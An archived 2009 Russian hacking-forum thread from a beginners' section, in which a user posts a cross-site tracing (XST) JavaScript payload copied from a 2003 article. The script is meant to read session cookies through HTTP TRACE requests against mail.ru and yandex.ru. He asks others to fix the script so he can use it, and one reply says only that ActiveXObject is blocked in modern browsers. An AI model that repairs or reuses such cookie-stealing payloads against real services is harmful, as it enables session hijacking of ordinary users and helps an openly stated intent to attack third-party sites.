Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

кража куков методом Trace

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> кража куков методом Trace
Имя
Сообщение << Старые топики   Новые топики >>
кража куков методом Trace - 2009-08-09 22:38:54.476666   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
недавно я просканил яндекс.ру Xspider`ом и увидел вот что:
возможен метод Trace можно выполнить межсайтинговый скриптинг".
я нашел про это статью у нас на сайте:http://www.xakep.ru/post/17540/default.asp. Там был следующий код скрипта, который выведет в всплывающем сообщении куки пользователя:
&lt;script&gt;&nbsp;
function xssDomainTraceRequest(){&nbsp;
var xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');&nbsp;
var exampleCode = xmlHttp;&nbsp;
xmlHttp.open ("TRACE","http://mail.ru",false);&nbsp;
xmlHttp.send ();&nbsp;
xmlDoc=xmlHttp.responseText;&nbsp;
alert (xmlDoc);&nbsp;
var target = "http://mail.ru";&nbsp;
cExampleCode = encodeURIComponent(exampleCode + ';top.close()');&nbsp;
var readyCode = 'font-size: expression(execScript(decodeURIComponent("' +&nbsp;
cExampleCode + '")))';&nbsp;
showModalDialog(target, null, readyCode);&nbsp;
}&nbsp;
&lt;/script&gt;&nbsp;

&lt;INPUT TYPE="BUTTON" OnClick="xssDomainTraceRequest()" VALUE="Show Cookie&nbsp;
Information Using TRACE"&gt;

он не работает….я заменил mail.ru на yandex.ru но всё равно не работает…кажется ошибка в синтаксисе - посмотрите плиз.
очень бы хотелось скрипт доработать и в дело пустить:D
Post #: 1
RE: кража куков методом Trace - 2009-08-12 22:44:02.750000   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
ну помогите кто-нить…..
Post #: 2
RE: кража куков методом Trace - 2009-09-14 18:01:36.153333   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
ActiveXObject - в современных браузерах запрещен политикой безопасности. И на дату статьи глянь - 2003 г. Поищи чонить поновее
Post #: 3
Страниц:  [1]
Все форумы >> [Для начинающих] >> кража куков методом Trace







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.